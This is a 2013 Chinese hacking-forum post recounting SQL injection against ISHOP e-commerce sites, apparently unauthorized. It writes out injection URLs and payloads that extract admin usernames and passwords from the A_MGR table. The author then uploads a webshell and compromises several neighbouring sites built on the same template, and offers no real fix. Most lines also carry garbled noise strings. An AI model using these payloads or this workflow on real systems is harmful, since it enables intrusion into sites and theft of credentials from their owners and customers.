中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
/ N) k3 a1 V" C9 W: x: ~http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389* ]! ?7 Z6 e# K1 v: n5 L, F- L& u

" p0 Q- Z6 @2 q, I习惯性的加’having1=1--0 M" h7 W' F) @3 n3 W( e- x" R

" x6 o7 O) |% P0 X. Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—4 w9 C: I* ?: j1 k0 j1 G- `

) C. x' Q3 i/ I: p$ t4 D" e0
- Z7 g7 S" O# m$ ]. f" e2 G9 J
+ [  P5 X3 p& o# M, t爆出Diary_A.dl_Title(这时候很激动啊). \, |7 P) `, g$ v3 R9 Q  |0 P

9 F7 }9 [9 S, G7 P, y4 `那么继续! V# L/ q3 r5 R4 k
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
  L7 h% ~7 a/ j% B+ l( f% D; N
/ x9 z' J" `3 ^1 S# Q继续,一直爆下去1 X) j" Q, @7 `; E2 m5 }; d* i; c2 Z
( E6 s7 u* k1 c% L
爆到几个字段和表段 但是没找到需要的管理用户的字段: c1 j  j6 D3 {
5 s4 P/ j2 x" J
蛋疼了 怎么办 然后去后台登陆页看源码$ v/ V8 g( [+ c' ]- h4 V

$ H5 Z8 f5 M) w7 o* I0
" Q) ^# p" V2 O* |# {+ y0 Z8 P8 R$ m7 e2 m1 o  T" M% ~; x
Input name= “ADUID”
% ^* l) m0 g1 w0 ?" vInput name= “ADPWD”5 }4 [" b8 F/ Z3 f- ?0 S* Z% ~
* S' A' ~5 u7 ]- W& P
很幸运 找到了字段那就继续
+ }3 n% g% i8 _+ {找到之后开始爆用户
3 q: r0 B1 m! S, m$ w. b/ k7 y6 }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) J3 M  ^( h& S
爆密码
: g- s6 r. k+ C. xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
* S, f) S1 D9 i3 z; s: t$ w7 e测试了下 这个注入点只能爆到文章哪里的表 & H& S! y# s+ [/ W1 E
) X# I7 n0 A- M5 i# B! f8 G
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
6 x% |$ E0 N0 A7 S! L
2 A2 \* V4 L' o9 h. n. X8 E  {又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* F8 F, s" S% Z3 V1 h* i4 ~9 x* K0 R' G; j' K* [/ E
473% d0 @+ \$ F. t# z" C2 ^

& d% h) E% R, w! [) z3 N' p" O进后台
1 H& D: I3 w3 E7 \: Z
* l' a7 Q0 {1 g. t' V
3 M) R- ~: J# a4 N& C发现几个上传点 有的地方不能上传 而且防止恶意代码/ J& h! D2 ~; T) d- R0 C! V

0 b: f$ [$ y6 W6 d+ ?( ~4 n8 Z没办法 各种百度各种找大牛 找到一只好像可以突破的马
3 |+ J% N& d/ Z9 O0 R  ^- Y3 a$ l' ?) W9 u0 P+ Y
5 f9 [, d: t0 S
在系统管理那里直接上传 不过没有显示地址
' @) C) N0 P4 Q$ p, u8 e, c
/ ~$ Y9 R, R! t- j+ P+ {% M再上传一次 抓包 搞定OK! J) @9 U& [& B5 e" p
5 d3 L/ a# F9 }5 `& Q" Q; B

; J6 q/ E- |' }2 g# @9 g' F/ p& b7 t
9 F. f6 P0 `! h472
1 k  o$ F& m+ n1 E0 [" H- _
" ~, [: {, x" R! k' T晚上不行了 去睡觉。。。$ k9 t, z" L9 L# U4 [1 [3 @
第二天刚起床 闲的没事做继续日站吧 6 o  _. P9 G7 V/ {

% u8 |; L( ]7 ]找个站 就把这个站的旁c扫了下  z4 p. G1 d+ s4 v) \( v0 [

$ U+ G! M3 e# o8 ?$ i发现c段也有一个购物站 ,然后还和这个站的模板差不多
) t! r. E! m. k; K; y6 p+ e6 u. y$ t: a8 J* H! F. `$ @
就找到会员登录口测试$ Y3 @9 u: `  q0 s& `$ Z0 a# F1 g$ q

* O% U1 j8 K/ p'and (select top 1 MGR_UID from A_MGR)>0—
. T4 {, f3 R* b4 I7 J7 h果断爆到了 这时候我很激动 通杀* Z2 n7 `/ S; x
) Z' Q6 K% F6 K) T2 \9 T1 N
再次翻c段( g1 C1 S/ G2 {& P% {& Z& ~. q
8 s/ y: \6 @7 G! {
翻出几个站 都成功拿下3 _0 u0 e: p# f# V2 G8 X

  E( }& B2 u% l9 K8 W. f
, H# q" r0 E8 I8 n+ h) _' w" a! x! Z4 o( f( g$ G
修复方案:4 l% `" s  L1 `1 u) C
他们比我专业 - i! ~; N- M8 k# X9 b5 S

+ {+ \) g4 O0 h- g
; a* E7 v* q* K4 p( |, @3 i+ W' V6 a- H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2